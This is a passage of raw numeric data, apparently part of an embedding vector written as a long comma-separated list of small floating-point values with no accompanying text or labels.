08209842,0.016515337,-0.008003879,-0.0072690276,-0.0014586548,-0.011131864,0.009913417,0.00803155,0.0062498525,-0.00044135068,0.011125939,-0.009596456,-0.004814861,0.018753573,0.01360795,0.0044392496,-0.011922214,0.009171632,0.0015697588,-0.0037730103,-0.007793844,0.0052502323,-0.0029736895,-0.0057613947,-0.018732868,0.015683599,-0.0016908132,-0.019993281,0.0141818505,-0.01285053,0.0069062933,-0.012267424,0.0029323816,-0.011627408,-0.00440795,0.009597466,-0.019744841,0.016633315,0.005532055,0.011086369,0.0119124325,0.0054839137,0.0009549618,0.017212097,0.010425176,-0.008690316,-0.027041243,-0.0004031974,-0.0128619755,0.034020536,0.0070425277,0.009068945,-0.012074506,-0.0030067973,-0.02992117,-0.012438753,0.003980607,0.00006586361,0.002989025,-0.0010156156,-0.010109604,-0.016486969,0.030956343,-0.00419992,0.000110784524,0.0065365606,0.02180572,0.02832131,0.0028074207,0.0036864672,0.022181462,0.001114102,-0.004482338,0.00048996956,-0.0022179722,-0.011611335,0.012458949,0.015910529,0.007854443,-0.012409851,-0.012641937,-0.0024575714,0.008151514,0.012565603,0.016168026,-0.004080917,-0.008633931,-0.025326023,0.005800694,-0.0071943095,-0.025596935,0.016579567,0.024183938,0.019115841,0.009115617,0.010187076,-0.01157533,0.002359754,-0.013096168,0.0045158253,-0.008675275,-0.016193843,0.027279861,0.00726527,-0.017699981,-0.0060384856,-0.0117458,0.024650186,0.022724807,0.025173783,-0.017801464,-0.018295826,0.0008013854,-0.005376167,0.008846683,0.006015489,-0.02827961,-0.011899207,0.0041197864,0.06508281,-0.010146667,0.0023622408,-0.013053638,-0.007621426,-0.016937075,-0.041240223,-0.013005078,0.0005947824,0.0009077005,-0.017275628,0.0020346278,0.011819003,0.02460444,-0.0039160727,0.00074983493,0.017626865,-0.018304938,-0.050478578,0.031070348,0.009162289,0.0018505971,-0.0011728256,-0.016971285,0.0049995733,-0.0077634426,-0.024489174,-0.010957555,-0.008147245,-0.003047764,0.010522387,0.006905654,-0.020003755,0.0010747064,0.010950335,-0.015202386,-0.008645176,0.0037492272,0.0031895735,0.007507992,-0.025085295,-0.010469525,-0.002658121,-0.005647376,0.0021072142,0.024079612,0.01092249,-0.01211355,-0.020742733,-0.0009104692,-0.0044180816,-0.002981674,0.025436351,-0.0025996133,-0.014969411,0.00990936,0.037460867,-0.0033233198,-0.022853456,0.014617275,-0.021070704,0.0069989385,0.0073789014,0.039042026,0.02793837,-0.018337488,0.021544022,0.007855085,-0.010969955,-0.010512557,-0.04532451,-0.0094396835,-0.026443452,-0.03765567,0.007916117,-0.0011356276,-0.015900185,0.006228664,-0.011366379,0.010865871,-0.0065280492,-0.0005724745,-0.009464941,-0.0028758526,-0.007398194,0.008399093,-0.014989952,-0.0047868546,0.016199341,0.011282481,0.010646526,0.030993355,-0.0034933242,0.009672756,-0.010657509,0.02963239,-0.008533081,-0.031909507,-0.006987362,-0.019679217,0.022110375,0.021165881,-0.0145481555,-0.0012352255,-0.004715042,0.0048917755,0.000546489,-0.011226002,-0.008009315,-0.021222923,0.032521494,-0.039071042,0.021652449,-0.0457408,-0.01785734,-0.018455287,0.0046687857,0.015215613,0.010620696,-0.03248539,-0.0006066529,-0.022075538,-0.0026826784,-0.002730531,-0.015464384,0.049102977,-0.018935323,-0.0037490223,-0.003627709,-0.0010192402,-0.010881214,-0.0031075974,0.0018514228,-0.018971331,-0.00653407,0.012148867,0.014333105,-0.032665424,0.0051193493,-0.012562769,0.024403986,0.00889092,-0.010615855,-0.008302755,-0.020080503,-0.019400518,0.004098602,0.006835947,-0.01614314,0.006274443,0.0017581283,0.009065,0.01793006,0.016026594,-0.0171004,-0.0029192313,-0.005133727,-0.013980076,0.0054606376,-0.012306649,-0.01548553,-0.0007781714,-0.011026921,0.028171279,-0.005459945,-0.005912206,0.0019075456,0.08296596,0.0054873913,-0.0249567,0.0007260784,-0.008352345,0.0004189709,0.016919728,0.0064951214,0.015490999,0.00873201,0.0024011522,-0.016787382,-0.0010023213,0.013052793,-0.009166118,0.009320814,-0.020127654,-0.0045717373,-0.0317927,-0.013705633,0.016415447,0.0040124273,0.0077640917,0.016412783,0.02140575,0.034743547,0.022413198,0.00081805215,0.0093392,-0.02251958,-0.0019209104,0.012140482,0.020181136,0.01295293,-0.023097476,0.018437212,0.026011929,-0.0050928066,-0.048221156,-0.004792575,0.0019847427,0.0045623365,-0.004697097,-0.03471248,0.0017093915,0.03773437,0.0013883415,-0.012386768,0.0011066855,0.034428064,0.002853527,0.0071583786,-0.017941618,0.016485902,-0.0011486688,0.022899551,0.009477176,-0.035275288,0.044959158,0.028952688,0.009161174,0.028078573,-0.006048921,0.003928482,-0.0065851095,0.019983044,-0.0016673732,-0.019773772,0.015257391,0.012866369,0.002733769,0.021555146,0.0021696356,0.008151337,-0.0028752405,0.012029979,0.008616026,-0.004717259,-0.0036239293,0.044856817,-0.011816551,0.004690325,0.0013881741,0.023287604,0.0026197718,0.01030113,0.0004302727,-0.0036002765,0.0040039783,-0.0083435215,0.0012211832,-0.0010114762,0.024631673,0.009028138,0.007700072,0.015891105,0.014662164,0.02584921,0.012747279,0.023850787,0.01191757,-0.0045434423,0.009545504,-0.021130603,-0.00094365934,-0.0056762784,0.0050998656,0.010188549,0.003686455,0.04151033,-0.031240143,0.022272721,-0.011299431,-0.010770472,0.01082401,-0.009639646,-0.0077899466,-0.013616744,-0.020430444,0.0128721045,0.03139376,-0.008521312,0.0015542657,0.0063856672,0.0011744357,0.011715945,-0.006931294,-0.028000724,0.0020378062,0.026649278,0.0015847086,0.012297171,0.0019969288,-0.028061135,0.020735156,0.010191315,-0.024093665,-0.016959375,0.04542148,0.017762944,0.009580535,0.03367674,0.015376968,0.014526233,0.0005085338,0.013115533,0.046786807,-0.007796298,-0.024734387,0.010039013,-0.012420185,-0.0016134902,0.013274988,-0.011499434,-0.006442055,-0.0033122222,0.03954298,-0.005080444,-0.02546867,-0.004412662,0.029267592,-0.023218215,-0.012533162,0.007083863,-0.025863973,0.029252388,-0.01987026,0.046631094,0.002978647,-0.027945368,-0.006988002,0.029669046,0.0074985484,-0.0016462583,-0.007856796,-0.008449604,0.0047989557,-0.0019242087,0.017654426,-0.0069103623,0.008846749,-0.021056974,-0.003992534,0.017181572,-0.00090855267,-0.02595475,-0.0071396474,0.0020428202,-0.012820683,-0.018093217,-0.022652991,-0.008318992,0.024065347,0.021090688,-0.0015907504,-0.01693275,0.0032021883,-0.0024474738,0.016757173,0.01413079,-0.0041558323,-0.006597943,-0.006834779,0.007446158,0.003244942,-0.0059958883,0.043974895,-0.006242299,0.0148957465,-0.0023063598,0.027634837,0.03610821,0.024964115,0.014088673,0.03812593,0.024022361,-0.013904883,-0.010489778,0.016199056,0.019497316,0.014996942,0.00025794565,0.0023271656,-0.010603558,0.0079945875,-0.015804732,0.009221618,0.013228059,-0.007920198,-0.017077202,-0.019168947,-0.021097742,-0.014803029,-0.0055788793,0.006001269,0.0006385821,-0.021435494,-0.0077323816,0.02371363,-0.0010801414,-0.016231166,0.000531318,0.023109445,0.00165465,0.0068725687,0.008081338,0.0016394246,0.018025186,0.017334191,-0.0046110377,-0.004507809,0.0016152288,0.028607016,0.00019044199,0.005966885,-0.0055756355,-0.019137312,0.0141433785,-0.01264195,0.012630087,-0.000083348335,0.027498275,-0.0025267983,0.027846241,-0.01960466,-0.014970723,0.007717517,-0.010733896,0.0010528514,0.005506481,0.016087199,0.0011624565,-0.009483693,-0.013273327,-0.019184235,-0.011996874,-0.014802522,0.037341837,-0.033659507,0.0056121177,0.0062175267,-0.005236201,-0.0041241185,0.02329298,-0.0018362891,0.010372227,0.0039627743,-0.015377634,-0.015535454,0.004239915,-0.010078657,-0.0065254606,0.027323317,-0.0057663787,-0.037689757,-0.0026462902,-0.025251491,-0.043372005,-0.032640025,0.029191524,0.013096821,0.00762391,0.005704328,-0.0006654298,-0.0017783928,-0.01677702,0.009786896,-0.040976055,0.011746352,0.00965606,-0.02302114,0.008873128,-0.022594735,-0.007037851,-0.0057403957,-0.042574827,0.008432755,0.0018603926,0.02675576,-0.009478484,0.008097772,0.015487982,-0.013505215,0.024517646,0.000100146164,0.0026168125,0.016664283,0.036811464,0.0066971984,0.011910731,0.0021046828,0.00933934,-0.0014276266,0.024768798,0.008651968,0.055719025,0.013096109,0.009115794,-0.00703381,-0.004021457,0.007843774,-0.005652546,-0.0047284043,0.03888739,0.018715529,0.0010411774,0.015201568,-0.020413527,0.018253218,0.0036644929,0.005774524,-0.024010725,0.0019395591,0.0139157185,0.01053156,0.028750885,-0.015994703,0.0029798406,-0.0005542844,-0.008133816,-0.023076758,0.023947734,0.016488198,0.008633132,0.013867541,-0.003960476,0.012224548,-0.017822705,0.0026008945,-0.016682694,0.002086481,-0.032756332,0.031020017,-0.021777317,0.0020247574,-0.05368936,0.011866572,0.032301594,0.008669431,-0.0036739153,-0.031964324,0.008391107,-0.002841541,-0.011459709,-0.024355216,-0.037742313,0.010899103,0.0350045,-0.035108395,0.0010771116,0.017237678,-0.012106233,-0.00458054,0.016992463,-0.023817565,-0.02607712,0.011167703,-0.007791173,0.00047721344,0.0011404221,0.027108874,0.01581794,-0.007915042,-0.0005357903,-0.009774766,-0.007888336,0.0043181973,-0.0030971847,0.019923994,-0.00865293,-0.00086991,-0.01856022,-0.023418162,-0.0025114245,0.030352803,-0.046983916,-0.012090756,-0.013440286,0.0038606157,0.006618717,0.02009721,-0.01978125,0.057419036,0.020492176,-0.021839414,0.0036784017,-0.011783391,0.0058543035,0.015166719,0.042605564,-0.016853891,-0.02799766,-0.020538678,0.016354274,-0.010674127,0.038183615,0.0009754659,-0.022869295,-0.023362061,-0.02537515,0.0036288514,-0.008709165,0.0036373169,0.011821398,-0.022646703,0.018019376,-0.006529069,0.022748338,0.0160959,0.013888908,0.0019928343,-0.00032556753,0.0037190802,-0.026075646,-0.004716774,0.0012289394,-0.009204039,-0.012613894,0.026047438,-0.027981479,-0.02435648,-0.021310743,-0.0034642848,-0.012786068,0.012977908,0.024446316,-0.022395186,-0.009401986,0.036942273,0.009959902,0.007266065,-0.015308729,-0.0149736125,0.0018702499,0.006198554,0.006532575,0.023139644,-0.009374127,0.037935562,0.00078324415,-0.0067608817,0.019018015,-0.0018201623,0.0032357469,0.012019309,-0.0051619373,0.0074559166,-0.017840479,0.029279524,-0.016680896,0.0010736461,0.030444616,0.0007889754,-0.012676695,-0.016117878,-0.033278007,-0.011089692,-0.013214719,0.0035766014,-0.031890634,0.009320526,-0.005050818,-0.0136823915,0.0029150967,-0.011291066,0.01762611,-0.0014838927,-0.005390472,0.0174135,0.00012920881,-0.032739125,-0.011624951,-0.0003491399,-0.0060997047,0.011979885,-0.019756274,0.005148676,0.012977643,0.02748538,-0.005834922,-0.0035871542,0.0201942,-0.0039571775,0.023011848,-0.00799345,0.008344767,-0.010496222,0.013518798,0.016370347,-0.02992797,-0.0033210048,0.011586824,-0.0024308627,0.0017350304,-0.0393564,0.008725534,-0.00089973264,-0.0070256754,0.005414094,-0.000012236633,0.02129282,0.0079944935,0.009027914,-0.018653736,-0.013688614,0.007427714,0.015167247,-0.016663166,0.0049015745,0.020874275,-0.027626762,0.006931366,-0.004135792,-0.017596168,0.008965513,-0.00046734855,0.0031589488,0.0060558417,-0.037662126,0.010267502,0.047207396,0.004484668,0.002837639,-0.032505285,-0.035331167,-0.012388465,-0.011002898,-0.011991437,-0.0034343775,0.0045602196,0.01776161,-0.008174542,-0.017445529,-0.014479902,-0.038903415,0.034489997,-0.02947587,-0.009449067,0.0011616704,-0.007817679,0.0072328844,0.0032756806,0.026464118,-0.015818875,0.022546854,-0.0072663147,0.01426587,0.0044112015,0.010216299,-0.0007994881,-0.014098552,0.010982008,0.037543915,0.006547103,0.010320107,0.00242245,0.009538054,-0.003467759,0.015353913,0.03019224,-0.011973833,-0.0005628631,-0.03128406,0.002098416,0.0010537126,0.0028700142,0.0011774292,-0.00083677477,-0.0028537717,-0.023513766,0.0007036643,0.01624755,-0.025608733,-0.0038099336,-0.014081755,-0.005175245,-0.016815016,0.038118433,-0.012020154,-0.027957177,-0.0021628174,-0.03021407,-0.013722909,-0.017760988,0.027958473,0.0070805126,-0.014780697,0.0106524965,-0.006214036,0.013187527,-0.00929694,0.014330811,0.022545978,0.0113823945,0.009836051,0.00048557817,0.008977782,0.03183642,-0.018434878,0.004766161,-0.026251,0.020008614,-0.026664682,0.012187208,-0.008279878,-0.022925954,-0.0060920413,0.009750277,-0.033647846,0.025164355,-0.024969162,-0.01788368,-0.008362635,-0.024969162,-0.003388593,0.004322426,-0.028794544,0.012566179,-0.013385912,-0.02126801,-0.0035146566,0.0005104069,0.0050720414,-0.01905587,-0.013577751,0.003100138,0.0015628994,0.011805827,-0.00045515122,0.0351116,0.015021622,0.004946201,-0.0069933594,-0.022731772,0.017345514,-0.029494865,0.0040450776,0.034898996,-0.0008676364,0.0003589972,-0.001092613,0.009338723,0.0064816056,0.02270049,-0.014840443,0.022090876,-0.005936279,0.009902547,0.02020199,0.016876083,-0.008062048,0.008646448,0.03395483,0.024443906,0.009979537,-0.0040777153,0.01500414,-0.0015545019,-0.0027971375,0.027112385,0.019180845,0.013510577,-0.034065407,0.016234832,-0.012836636,0.04936276,0.019826692,-0.034738265,0.012155589,0.02024654,0.0038871958,-0.032209832,-0.015244031,-0.0064249123,-0.0006289817,0.0039869025,-0.010712949,0.011031235,0.028644888,-0.009728046,0.01522164,0.017354468,-0.0025607469,-0.0077610263,-0.0010317548,-0.00006948008,0.017994894,0.0101767145,-0.018220263,-0.012690028,-0.0075258464,-0.019143486,-0.0012085473,0.020102108,-0.0031406865,-0.0032806103,-0.001366853,-0.00058680977,-0.019244486,0.0086865,-0.015907278,0.014523793,-0.010785996,-0.012802808,-0.0032647818,0.01682946,-0.008273549,0.019237181,-0.0033337602,0.00048813244,0.028923664,0.031967398,0.0010927714,0.008734751,-0.00939601,0.032089595,0.011148425,0.009731753,0.0015563231,-0.012405383,-0.0033267273,-0.008498325,-0.014499254,-0.026438499,-0.007522258,-0.01734846,0.011531287,-0.00753509,-0.017562354,0.02969675,-0.007191354,0.023111613,-0.0073746326,-0.003857691,0.0068214317,0.014172341,0.012494825,0.0058700778,-0.007074416,-0.0028515744,-0.0038141373,-0.04581352,-0.008707486,-0.0010608386,-0.007313542,-0.009903361,0.006555536,-0.0355267,-0.024091339,0.015993152,-0.014458,-0.008295243,0.014009543,-0.026262067,0.0069805076,0.010595124,0.011675666,0.012541155,0.012472429,-0.027433762,0.047646444,0.0017951241,0.006759516,-0.010563033,0.019675406,-0.018286416,0.037116293,0.018060705,-0.027723553,0.005086036,0.0045910473,0.013956202,0.020112704,-0.011025028,0.004067376,0.013716434,0.025441498,-0.014880249,-0.018324763,0.019892016,-0.01276045,-0.0018028078,-0.005548083,0.007471847,-0.009715551,0.006394805,0.0028371445,-0.004426846,-0.014361726,-0.017354311,-0.015029835,0.0043240897,-0.0019793126,-0.019004608,0.0037955092,-0.008810449,-0.013243552,-0.0017997873,-0.021926576,0.00849917,-0.004721186,0.028193345,-0.0011985484,0.010774347,0.006377203,0.0017670406,-0.024080787,0.002239343,0.0070743733,0.018574765,-0.0010145257,0.007022733,0.017761989,0.030317288,0.009657442,0.0040281946,-0.0059886966,-0.026827939,0.02668168,0.021161761,-0.0021465367,-0.010167877,0.01935229,0.0057186997,-0.012031863,-0.0046728114,0.00018825699,0.003366672,0.015782677,0.011298919,-0.00867655,-0.024595289,-0.0037835713,-0.011296172,0.049099643,-0.0008901649,0.0026500619,-0.006533562,0.028245771,-0.019727403,0.03095946,-0.0020488268,0.02779233,-0.02095776,-0.043249466,-0.0216658,0.0019949267,-0.013991474,0.017597614,-0.009708144,0.012292354,-0.003873452,-0.005095237,0.0320313,-0.015540201,0.00085129286,-0.008261443,-0.019536497,-0.00010284241,0.008555378,0.0042383927,-0.011166985,0.034414537,0.008275108,-0.0051298435,-0.015541833,0.026639879,0.00365268,-0.005108653,0.0014071846,0.011526921,0.002982399,-0.008601372,0.0056315702,-0.0007022374,-0.018108271,0.036623932,0.0006203521,0.0029385542,-0.028539317,-0.008445095,0.0019987463,0.017011669,-0.012473862,0.0066652354,-0.012707504,-0.013493643,0.0034005542,-0.0019025471,0.021641986,0.014569021,0.020934982,0.027776673,-0.02239204,0.0011710182,-0.0052491175,0.00054072146,0.011690456,-0.005336424,-0.0037988694,0.026938746,-0.020003617,0.004473976,-0.03360214,0.01280083,-0.00085794675,0.0069796448,0.014213994,0.017483694,0.0281153,0.007914652,-0.004939093,0.005879681,0.008514731,0.007845554,0.0038564685,0.027959317,-0.000037328376,-0.028463954,0.017769733,0.012984702,0.0020274043,0.054459758,0.007714887,-0.0012766506,-0.028336473,0.015936434,0.024464166,0.013049778,0.014138883,0.001022649,0.012222797,-0.009753041,0.005504152,-0.017372677,0.0068976707,0.030826917,-0.009646388,0.022543876,0.00071555,-0.020577034,-0.01601257,0.014761775,0.021376284,0.02573577,0.0005955316,0.012467933,0.016093448,0.0014644343,0.008658285,0.000544041,-0.011270132,-0.012458769,0.013816591,-0.0055524004,0.00058701844,-0.013702145,-0.026910143,0.011487297,0.1059401,0.010694945,-0.0056990506,0.029438565,-0.011024424,0.022531517,-0.048744794,0.021162288,-0.02268153,-0.01737202,-0.0040698075,-0.014400414,-0.0104982015,0.00874007,0.011194048,0.008377493,0.0057088593,-0.008393445,0.011806951,-0.01592223,-0.017466258,0.021674545,-0.015255536,-0.00801763,-0.050637927,-0.012297158,-0.0010619712,0.0008910311,-0.0039033655,-0.026779473,-0.018315198,-0.009059819,0.008626346,-0.008617185,-0.014577991,0.01451376,0.006171225,0.023549154,-0.00044108962,0.008839769,0.012478925,0.022557493,-0.0053042867,-0.041552883,-0.12818877,0.009530197,0.00031966701,-0.017000178,0.033333432,-0.018715175,-0.0057099764,-0.0014450958,-0.0012637103,-0.018009953,0.0076557966,0.010197383,0.00040886964,0.013936793,-0.015682653,-0.0017536525,0.0027331533,0.016288554,-0.027318692,0.0029480015,0.029584179,0.015191729,-0.002341296,-0.012868033,-0.02624929,0.010816067,-0.0015419127,0.036237575,-0.009396714,0.014717448,-0.013705347,0.014265037,-0.013134893,-0.0052960636,-0.006615166,-0.014246881,-0.01060762,0.0024532867,-0.011184071,0.015405275,-0.0017069186,0.0007032697,0.004910689,-0.0059366063,-0.015429063,0.026382368,-0.0024140626,0.025638616,0.019273067,-0.0050500734,0.007822165,0.014366198,-0.008996689,0.009051782,0.0010161905,0.005205756,-0.019230098,-0.012071224,-0.015379697,0.0017334468,-0.015112884,-0.030272195,0.016489975,0.0005854507,0.027759306,0.0059507056,0.028807893,-0.03562847,-0.00043089845,0.018643541,0.013604077,0.0039861705,0.0024220508,-0.02749005,0.005315562,0.0057687345,-0.01794277,-0.011402656,0.0120056765,0.0138942925,0.01932609,-0.011236043,-0.0063381544,-0.008969837,0.024384411,-0.00905964,0.004016385,0.012170031,-0.014945093,-0.016417714,0.018952113,-0.0011837136,0.0044856304,0.006454369,0.012604792,0.0004223943,0.044619076,-0.021556074,-0.03298967,0.009987009,0.0035980975,-0.031030687,-0.018335192,-0.0070791063,0.0023881195,-0.014195101,0.00070518034,-0.0016825887,-0.021439644,-0.0046693813,-0.022821523,-0.0038500703,0.025056792,0.010502782,-0.013114591,-0.023933664,0.0026874538,0.010759837,0.010686912,0.003158145,-0.0326829,0.00835549,0.012412838,0.028376821,0.032404307,0.01759925,-0.02010677,-0.0064311805,-0.0021928381,0.008941732,-0.023898251,0.0062480913,-0.018986456,0.015356373,-0.00787091,-0.005937988,-0.02340968,0.004611925,-0.037314102,-0.014161391,-0.001862746,0.000011224678,-0.006938368,0.0055175275,0.019661913,-0.011258697,0.04700189,0.011513164,0.015454058,-0.0066268016,0.0013745619,0.009697438,-0.026445625,-0.02590663,0.018549774,0.05427424,-0.00031039258,-0.030455673,0.004935526,0.023165448,0.013763183,0.023310024,-0.017765881,0.013191798,-0.006043571,-0.006317236,-0.02943853,-0.015305019,-0.009948745,-0.019153643,0.021332718,0.013332984,0.028798643,0.011142947,0.015901124,0.016896516,-0.011011349,-0.0053050835,0.016580407,0.0026839417,0.0038760903,-0.0033571294,0.018537512,0.0057734363,0.007527578,-0.020161927,-0.022191366,0.0006766758,0.010415441,0.02738044,-0.037165932,-0.0011506174,0.0070107216,0.0056854887,-0.014900379,-0.00043426375,0.024275236,0.009041418,-0.024971355,-0.009696016,-0.01582151,-0.022839038,-0.016260874,0.022702305,0.0069602146,0.009438762,0.010447385,0.015669134,-0.021506293,-0.013390894,-0.0066160024,-0.0014596615,-0.0038895726,0.005473003,-0.016006675,0.015240641,-0.018884024,-0.0198504,-0.006348479,-0.005896221,0.006699831,0.004441027,-0.005534432,-0.006317101,0.01012351,-0.018374724,0.0136494925,-0.0057160533,0.0012508325,-0.0073007885,-0.0018058108,-0.004512967,0.00005962454,-0.0014047684,0.021578478,0.02417438,0.026359072,-0.011060268,-0.0016498861,-0.00271456,-0.04692247,-0.0072197192,0.042454273,-0.021594934,0.004914785,-0.002612699,-0.007927766,0.026272401,0.0028301503,0.02420411,0.0011429779,0.015675327,0.014576608,0.046726543,0.016848374,0.020096835,-0.019988075,0.004543166,-0.040727053,0.010569375,-0.008966798,0.015561715,-0.002308822,0.01445888,-0.025253106,-0.018174585,-0.021941736,0.012194264,-0.019353488,-0.012373186,0.035962798,-0.0009635365,-0.005638414,0.022155918,-0.007966502,-0.012602506,0.0009366931,0.021639764,-0.018441103,0.043042976,-0.009534449,0.014662925,0.017084591,-0.021373397,0.013367454,-0.010527867,0.037281305,0.000623161,0.008698293,-0.024526387,-0.0032653215,-0.002194494,0.007399354,-0.0043964824,0.009004185,-0.016071336,-0.02436274,0.004855324,-0.013635579,-0.0031637559,0.015146742,-0.0020216072,-0.009625314,-0.026570618,0.0002661489,-0.0149720395,-0.0053397245,0.010402395,0.0063324575,0.0048365574,0.0068031326,-0.03205433,-0.00879066,-0.031247005,0.0023764456,0.008992474,0.0126614375,0.011494669,-0.002733191,-0.003611335,0.031557035,0.027338216,-0.008965382,0.034744535,0.00043713686,-0.017882837,-0.018616164,-0.0063167885,0.007543647,0.0016851645,0.017646182,0.021138176,0.023339732,0.017954418,-0.021219738,0.025342466,0.022600427,0.011707457,-0.022571413,-0.017037421,0.009400337,-0.0011802558,0.020466741,-0.0005762857,-0.004553309,-0.013870251,-0.007934841,-0.0099344,-0.0036804094,-0.0045687747,-0.0030707712,0.011380664,-0.017213663,0.0122688,0.032850694,0.006421361,0.035758074,-0.02725605,-0.0068094754,0.015113873,-0.010217547,-0.012400547,-0.012989594,-0.01833674,-0.0050872867,-0.0022063658,0.011684303,0.0097257495,0.00042778513,-0.006414404,-0.031138618,-0.0063643535,0.024754066,0.00787845,-0.033193897,0.0073808874,0.004079275,-0.0072427085,-0.0069445996,0.015129412,-0.010250028,-0.041759018,0.04858044,0.008007662,-0.02185845,0.02613597,0.014208587,0.022088652,0.0024310902,0.01811311,-0.024949973,0.0033880004,-0.017507296,-0.050843533,0.007123549,0.014018952,-0.0072456747,-0.026636016,-0.000934547,-0.022833124,-0.009436685,-0.020480387,0.008735786,0.0049556307,0.022253526,-0.011274663,-0.015505998,-0.036802303,0.014961568,0.033014033,-0.02460226,0.0077558677,0.026361467,-0.0061912625,-0.023700021,-0.012540805,-0.025617607,0.002486122,-0.0035333072,0.014936169,0.015354991,-0.016364554,0.03993691,0.006461508,-0.0031637372,-0.0008095996,0.01384917,-0.024057584,0.024219265,-0.00018398638,-0.0075719496,-0.0011969686,-0.0007092749,0.02163968,0.0296936,0.0013047734,-0.023957748,0.019150762,0.005479325,-0.0063510337,0.00835265,0.006713174,0.017853698,-0.006705623,-0.028610623,-0.00022136414,0.021249557,0.021663863,-0.006353695,-0.0026347365,0.0010066008,0.0019827911,-0.009095262,0.008791739,-0.00021552731,0.021000694,-0.0016435888,0.0049338276,0.0025518606,0.0013689909,0.005251671,0.014351691,-0.023789316,0.009061879,-0.008395514,-0.023032732,-0.010719004,0.012922647,0.015097172,0.013908511,0.001850924,-0.0064423415,0.029680273,-0.010757198,0.019554276,-0.0021805689,-0.0032319673,0.011542309,-0.002847157,-0.02177461,0.017045317,-0.020117372,-0.0037604556,0.0018586359,-0.0185186,0.0069161016,-0.029081224,0.010642904,-0.036701147,0.00026610366,-0.01908467,-0.014947077,-0.029469077,-0.021539748,-0.0059126792,0.038350657,0.009597126,-0.05461699,-0.017932352,0.020395035,0.0052556796,-0.01303897,-0.001614611,-0.007219034,-0.008047502,-0.0050676623,0.0013645745,0.0062989085,0.027507158,-0.00688779,0.0041336343,-0.017336568,0.0065660896,0.017140774,-0.0031207623,0.024443846,0.014862851,0.008419314,0.005960363,-0.0076081944,-0.00016087353,0.021240825,-0.009025164,0.0013908284,-0.0037831787,-0.011298804,0.0008964562,0.016323416,0.005143481,0.0063035632,0.008415725,0.010279881,0.024953352,0.0112021975,0.010835942,0.017105144,0.013213905,0.02607471,-0.038141016,-0.023069885,0.016758468,-0.006395074,-0.004835436,-0.0065659317,0.010119126,0.0022452036,0.022274936,0.0045524905,-0.016289609,0.0016471659,0.0073089562,-0.007019695,0.00044806546,0.0002753101,-0.011933784,-0.02776332,-0.03589813,0.009746615,-0.01932511,0.026974164,0.008980593,-0.0020385447,-0.016102647,0.01288611,0.00484407,-0.02364455,-0.011442072,0.0019228309,-0.03273433,-0.012088939,0.007315673,0.008685019,-0.0077285958,-0.016769359,0.016500954,0.007212726,-0.018513367,0.0064334827,0.012229306,0.016636731,-0.0028389602,-0.02378895,-0.008035351,0.009064474,-0.011496925,0.016970217,0.003939331,0.0039553526,0.0062070023,-0.0011573073,-0.014362623,-0.024332324,-0.095088564,-0.0027867854,0.0014088575,0.001183067,-0.009061625,-0.003889119,0.011903245,0.000937924,0.028614692,0.014323355,-0.02163476,-0.004746659,-0.018758954,-0.0039418135,0.0032537435,0.01536975,-0.016659897,-0.0073939012,0.006716701,-0.02097621,-0.0019586296,-0.024832807,-0.009733855,0.0123466225,0.008509887,0.009973312,-0.008455993,0.033433765,0.06030162,-0.008395307,0.0062040687,-0.009737024,-0.008693869,0.0046164654,-0.04516054,0.0027551437,0.009171197,-0.012040608,0.0013816298,0.025242137,0.010984298,-0.0046593267,0.011809074,0.01687084,-0.015502828,-0.006599955,-0.007524132,0.012907489,-0.016532896,0.022269456,0.014643119,-0.005529197,-0.019313708,-0.0024305547,-0.029819421,0.006339992,-0.012109872,0.014286228,-0.0026716085,0.0093653975,-0.017082164,-0.015227733,-0.03948084,0.01486163,-0.019412968,0.026366884,0.0042120605,-0.002413767,0.0031972628,0.026117483,0.010917007,0.02409113,-0.01019369,-0.020088958,0.024518387,0.0065517947,0.038751375,0.018597493,0.0115442,0.01637328,0.006304287,-0.028419062,0.0071840174,0.023763273,-0.028262742,0.013938591,0.008758709,0.016440516,-0.0014260514,-0.023876445,-0.0069826636,0.02477062,-0.021113554,0.030917117,0.024919273,0.00009360174,0.050196264,-0.005142092,0.0018285722,-0.017600264,0.005401192,-0.0010139147,0.011597322,0.021937728,-0.046019334,0.014974852,0.011048002,-0.020163134,0.013089031,-0.00084338663,0.01119008,0.023966935,-0.030181475,-0.009488304,0.023461571,0.016069148,-0.0057202713,-0.012966655,0.0019254048,-0.026210243,-0.002219873,0.021019535,-0.011365865,-0.0064816833,-0.005998036,-0.026485194,-0.020956725,0.022948604,-0.015068558,-0.003821972,-0.0048523564,0.0019790288,0.012727195,0.010943415,0.0076388605,0.008509746,-0.008255336,0.015647873,0.010538274,0.0032040884,-0.0021538239,-0.008821514,0.020486824,-0.028584555,0.008700506,-0.014755377,-0.0003425345,-0.012881601,-0.024520114,0.021086583,0.0054039904,-0.012659391,0.027464887,-0.012425033,0.0036586705,0.0017849195,-0.010172932,0.0017900607,0.0026943546,0.011049838,-0.0044142473,0.0139787635,0.011232302,-0.007897526,-0.006743132,-0.0041958494,-0.017786074,-0.00173106,-0.009902646,0.012940584,-0.007934195,-0.0095108105,0.017591782,-0.068179384,-0.009678417,0.02395298,0.018541617,0.0075827558,0.026578443,0.03133276,-0.020566264,0.0052090706,-0.021483434,0.0056785545,0.017032163,0.016553108,0.0026640722,-0.01103609,-0.015447127,-0.0020256604,0.02558834,0.01727863,-0.020491531,0.00019128145,0.0025504373,-0.007068216,-0.0019596308,-0.013954488,-0.004509692,-0.00915079,-0.031405926,0.017989483,-0.007297477,-0.023130924,0.0065878723,-0.01319597,0.001281059,0.05210259,0.007442901,-0.003046411,-0.023373703,0.033420168,-0.022583017,-0.014875626,0.011544515,0.019591907,0.0007674554,-0.02575018,0.019793356,-0.0017153064,-0.018158562,-0.004570923,0.022984948,-0.01273601,-0.008976066,0.045720477,0.017120771,0.004220106,-0.030104702,-0.014749537,0.009041533,0.03879231,-0.028045885,0.0122551825,-0.010070911,-0.018316938,-0.0039750407,-0.0005901879,0.003476075,0.013046051,0.027716624,-0.0034064697,0.035407275,0.013463492,0.033008255,-0.00084418623,-0.0014744337,-0.021583207,0.02833072,0.029251713,-0.00053255,-0.013597297,-0.007530856,-0.012520411,0.0079313405,0.0147515545,-0.004136072,0.01497462,-0.026774773,0.008960877,-0.02540289,-0.0048904414,-0.03224587,0.00065921224,0.00591244,0.019091014,-0.0020306422,-0.023702966,-0.004567459,-0.0041448604,0.018832002,-0.0013719365,0.012208503,0.0019566938,-0.014654526,-0.0027719475,0.018257875,0.010664432,0.0013558179,-0.00035868707,-0.009634915,-0.009213293,-0.017659578,0.007270994,0.004500836,0.022161871,0.012391501,0.01229734,0.0022281485,0.009211795,-0.008089904,-0.0047801505,-0.0022940475,-0.017603286,0.00023037584,0.03148163,0.018654825,0.007885694,-0.0015880627,0.008499246,0.019208392,-